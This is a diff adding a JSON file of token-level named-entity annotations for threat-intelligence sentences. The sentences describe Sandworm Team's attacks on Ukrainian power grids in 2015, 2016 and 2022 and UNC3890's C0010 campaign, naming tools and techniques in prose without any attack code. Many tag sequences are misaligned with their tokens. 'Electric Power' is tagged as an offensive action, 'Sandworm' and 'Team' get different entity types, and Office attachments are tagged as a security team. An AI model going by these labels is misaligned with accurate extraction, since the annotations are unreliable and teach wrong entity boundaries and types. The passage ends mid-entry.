diff --git "a/labeled_cti_data.json" "b/labeled_cti_data.json" new file mode 100644--- /dev/null +++ "b/labeled_cti_data.json" @@ -0,0 +1,552502 @@ +[ + { + "tokens": [ + "During", + "the", + "2015", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "modified", + "in-registry", + "internet", + "settings", + "to", + "lower", + "internet", + "security." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2015", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "created", + "privileged", + "domain", + "accounts", + "to", + "be", + "used", + "for", + "further", + "exploitation", + "and", + "lateral", + "movement." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2015", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "installed", + "a", + "modified", + "Dropbear", + "SSH", + "client", + "as", + "the", + "backdoor", + "to", + "target", + "systems." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2015", + "Ukraine", + "Electric", + "Power", + "Attack,", + "vba_macro.exe", + "deletes", + "itself", + "after", + "`FONTCACHE.DAT`,", + "`rundll32.exe`,", + "and", + "the", + "associated", + ".lnk", + "file", + "is", + "delivered." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "O", + "B-OffAct", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2015", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "pushed", + "additional", + "malicious", + "tools", + "onto", + "an", + "infected", + "system", + "to", + "steal", + "user", + "credentials,", + "move", + "laterally,", + "and", + "destroy", + "data." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2015", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "gathered", + "account", + "credentials", + "via", + "a", + "BlackEnergy", + "keylogger", + "plugin." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2015", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "moved", + "their", + "tools", + "laterally", + "within", + "the", + "corporate", + "network", + "and", + "between", + "the", + "ICS", + "and", + "corporate", + "network." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2015", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "leveraged", + "Microsoft", + "Office", + "attachments", + "which", + "contained", + "malicious", + "macros", + "that", + "were", + "automatically", + "executed", + "once", + "the", + "user", + "permitted", + "them." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "I-OffAct", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "I-SamFile", + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2015", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "modified", + "in-registry", + "Internet", + "settings", + "to", + "lower", + "internet", + "security", + "before", + "launching", + "`rundll32.exe`,", + "which", + "in-turn", + "launches", + "the", + "malware", + "and", + "communicates", + "with", + "C2", + "servers", + "over", + "the", + "Internet.", + "." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2015", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "used", + "BlackEnergy’s", + "network", + "sniffer", + "module", + "to", + "discover", + "user", + "credentials", + "being", + "sent", + "over", + "the", + "network", + "between", + "the", + "local", + "LAN", + "and", + "the", + "power", + "grid’s", + "industrial", + "control", + "systems." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2015", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "loaded", + "BlackEnergy", + "into", + "svchost.exe,", + "which", + "then", + "launched", + "iexplore.exe", + "for", + "their", + "C2." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2015", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "remotely", + "discovered", + "systems", + "over", + "LAN", + "connections.", + "OT", + "systems", + "were", + "visible", + "from", + "the", + "IT", + "network", + "as", + "well,", + "giving", + "adversaries", + "the", + "ability", + "to", + "discover", + "operational", + "assets." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "O", + "B-OffAct", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2015", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "used", + "a", + "backdoor", + "which", + "could", + "execute", + "a", + "supplied", + "DLL", + "using", + "`rundll32.exe`." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2015", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "obtained", + "their", + "initial", + "foothold", + "into", + "many", + "IT", + "systems", + "using", + "Microsoft", + "Office", + "attachments", + "delivered", + "through", + "phishing", + "emails." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "I-OffAct", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "I-Way", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2015", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "used", + "valid", + "accounts", + "on", + "the", + "corporate", + "network", + "to", + "escalate", + "privileges,", + "move", + "laterally,", + "and", + "establish", + "persistence", + "within", + "the", + "corporate", + "network." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2015", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "installed", + "a", + "VBA", + "script", + "called", + "`vba_macro.exe`.", + "This", + "macro", + "dropped", + "`FONTCACHE.DAT`,", + "the", + "primary", + "BlackEnergy", + "implant;", + "`rundll32.exe`,", + "for", + "executing", + "the", + "malware;", + "`NTUSER.log`,", + "an", + "empty", + "file;", + "and", + "desktop.ini,", + "the", + "default", + "file", + "used", + "to", + "determine", + "folder", + "displays", + "on", + "Windows", + "machines." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2015", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "used", + "BlackEnergy", + "to", + "communicate", + "between", + "compromised", + "hosts", + "and", + "their", + "command-and-control", + "servers", + "via", + "HTTP", + "post", + "requests." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "used", + "the", + "`sp_addlinkedsrvlogin`", + "command", + "in", + "MS-SQL", + "to", + "create", + "a", + "link", + "between", + "a", + "created", + "account", + "and", + "other", + "servers", + "in", + "the", + "network." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Purp", + "B-Features", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "used", + "a", + "script", + "to", + "attempt", + "RPC", + "authentication", + "against", + "a", + "number", + "of", + "hosts." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "used", + "a", + "trojanized", + "version", + "of", + "Windows", + "Notepad", + "to", + "add", + "a", + "layer", + "of", + "persistence", + "for", + "Industroyer." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "added", + "a", + "login", + "to", + "a", + "SQL", + "Server", + "with", + "`sp_addlinkedsrvlogin`." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "disabled", + "event", + "logging", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "I-OffAct", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "created", + "two", + "new", + "accounts,", + "“admin”", + "and", + "“система”", + "(System).", + "The", + "accounts", + "were", + "then", + "assigned", + "to", + "a", + "domain", + "matching", + "local", + "operation", + "and", + "were", + "delegated", + "new", + "privileges." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "O", + "B-OffAct", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "used", + "Mimikatz", + "to", + "capture", + "and", + "use", + "legitimate", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "used", + "`move`", + "to", + "transfer", + "files", + "to", + "a", + "network", + "share." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "masqueraded", + "executables", + "as", + "`.txt`", + "files." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "DLLs", + "and", + "EXEs", + "with", + "filenames", + "associated", + "with", + "common", + "electric", + "power", + "sector", + "protocols", + "were", + "used", + "to", + "masquerade", + "files." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Org", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "used", + "heavily", + "obfuscated", + "code", + "with", + "Industroyer", + "in", + "its", + "Windows", + "Notepad", + "backdoor." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "used", + "PowerShell", + "scripts", + "to", + "run", + "a", + "credential", + "harvesting", + "tool", + "in", + "memory", + "to", + "evade", + "defenses." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "checked", + "for", + "connectivity", + "to", + "resources", + "within", + "the", + "network", + "and", + "used", + "LDAP", + "to", + "query", + "Active", + "Directory,", + "discovering", + "information", + "about", + "computers", + "listed", + "in", + "AD." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "I-OffAct", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "utilized", + "`net", + "use`", + "to", + "connect", + "to", + "network", + "shares." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "used", + "various", + "MS-SQL", + "stored", + "procedures." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "I-OffAct", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "used", + "UPX", + "to", + "pack", + "a", + "copy", + "of", + "Mimikatz." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "created", + "VBScripts", + "to", + "run", + "on", + "an", + "SSH", + "server." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "used", + "the", + "`xp_cmdshell`", + "command", + "in", + "MS-SQL." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "I-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "WMI", + "in", + "scripts", + "were", + "used", + "for", + "remote", + "execution", + "and", + "system", + "surveys." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "I-OffAct", + "I-OffAct", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2016", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "used", + "an", + "arbitrary", + "system", + "service", + "to", + "load", + "at", + "system", + "boot", + "for", + "persistence", + "for", + "Industroyer.", + "They", + "also", + "replaced", + "the", + "ImagePath", + "registry", + "value", + "of", + "a", + "Windows", + "service", + "with", + "a", + "new", + "backdoor", + "binary." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2022", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "deployed", + "CaddyWiper", + "on", + "the", + "victim’s", + "IT", + "environment", + "systems", + "to", + "wipe", + "files", + "related", + "to", + "the", + "OT", + "capabilities,", + "along", + "with", + "mapped", + "drives,", + "and", + "physical", + "drive", + "partitions." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2022", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "leveraged", + "Group", + "Policy", + "Objects", + "(GPOs)", + "to", + "deploy", + "and", + "execute", + "malware." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "I-OffAct", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2022", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "used", + "a", + "Group", + "Policy", + "Object", + "(GPO)", + "to", + "copy", + "CaddyWiper's", + "executable", + "`msserver.exe`", + "from", + "a", + "staging", + "server", + "to", + "a", + "local", + "hard", + "drive", + "before", + "deployment." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2022", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "leveraged", + "Systemd", + "service", + "units", + "to", + "masquerade", + "GOGETTER", + "malware", + "as", + "legitimate", + "or", + "seemingly", + "legitimate", + "services." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "I-OffAct", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2022", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "proxied", + "C2", + "communications", + "within", + "a", + "TLS-based", + "tunnel." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "I-OffAct", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2022", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "utilized", + "a", + "PowerShell", + "utility", + "called", + "TANKTRAP", + "to", + "spread", + "and", + "launch", + "a", + "wiper", + "using", + "Windows", + "Group", + "Policy." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2022", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "deployed", + "the", + "GOGETTER", + "tunneler", + "software", + "to", + "establish", + "a", + "“Yamux”", + "TLS-based", + "C2", + "channel", + "with", + "an", + "external", + "server(s)." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "O", + "B-OffAct", + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2022", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "leveraged", + "Scheduled", + "Tasks", + "through", + "a", + "Group", + "Policy", + "Object", + "(GPO)", + "to", + "execute", + "CaddyWiper", + "at", + "a", + "predetermined", + "time." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "I-OffAct", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2022", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "configured", + "Systemd", + "to", + "maintain", + "persistence", + "of", + "GOGETTER,", + "specifying", + "the", + "`WantedBy=multi-user.target`", + "configuration", + "to", + "run", + "GOGETTER", + "when", + "the", + "system", + "begins", + "accepting", + "user", + "logins." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "O", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "2022", + "Ukraine", + "Electric", + "Power", + "Attack,", + "Sandworm", + "Team", + "deployed", + "the", + "Neo-REGEORG", + "webshell", + "on", + "an", + "internet-facing", + "server." + ], + "ner_tags": [ + "O", + "O", + "B-Time", + "B-Area", + "I-OffAct", + "I-OffAct", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "C0010,", + "UNC3890", + "actors", + "established", + "domains", + "that", + "appeared", + "to", + "be", + "legitimate", + "services", + "and", + "entities,", + "such", + "as", + "LinkedIn,", + "Facebook,", + "Office", + "365,", + "and", + "Pfizer." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-Org", + "I-Org", + "O", + "O", + "B-Org" + ] + }, + { + "tokens": [ + "During", + "C0010,", + "UNC3890", + "actors", + "likely", + "compromised", + "the", + "domain", + "of", + "a", + "legitimate", + "Israeli", + "shipping", + "company." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "I-Org", + "O" + ] + }, + { + "tokens": [ + "During", + "C0010,", + "UNC3890", + "actors", + "likely", + "established", + "a", + "watering", + "hole", + "that", + "was", + "hosted", + "on", + "a", + "login", + "page", + "of", + "a", + "legitimate", + "Israeli", + "shipping", + "company", + "that", + "was", + "active", + "until", + "at", + "least", + "November", + "2021." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Time", + "O" + ] + }, + { + "tokens": [ + "For", + "C0010,", + "the", + "threat", + "actors", + "compromised", + "the", + "login", + "page", + "of", + "a", + "legitimate", + "Israeli", + "shipping", + "company", + "and", + "likely", + "established", + "a", + "watering", + "hole", + "that", + "collected", + "visitor", + "information." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0010,", + "UNC3890", + "actors", + "downloaded", + "tools", + "and", + "malware", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "C0010,", + "UNC3890", + "actors", + "used", + "unique", + "malware,", + "including", + "SUGARUSH", + "and", + "SUGARDUMP." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "For", + "C0010,", + "UNC3890", + "actors", + "obtained", + "multiple", + "publicly-available", + "tools,", + "including", + "METASPLOIT,", + "UNICORN,", + "and", + "NorthStar", + "C2." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "For", + "C0010,", + "UNC3890", + "actors", + "staged", + "malware", + "on", + "their", + "infrastructure", + "for", + "direct", + "download", + "onto", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "C0010,", + "UNC3890", + "actors", + "staged", + "tools", + "on", + "their", + "infrastructure", + "to", + "download", + "directly", + "onto", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + 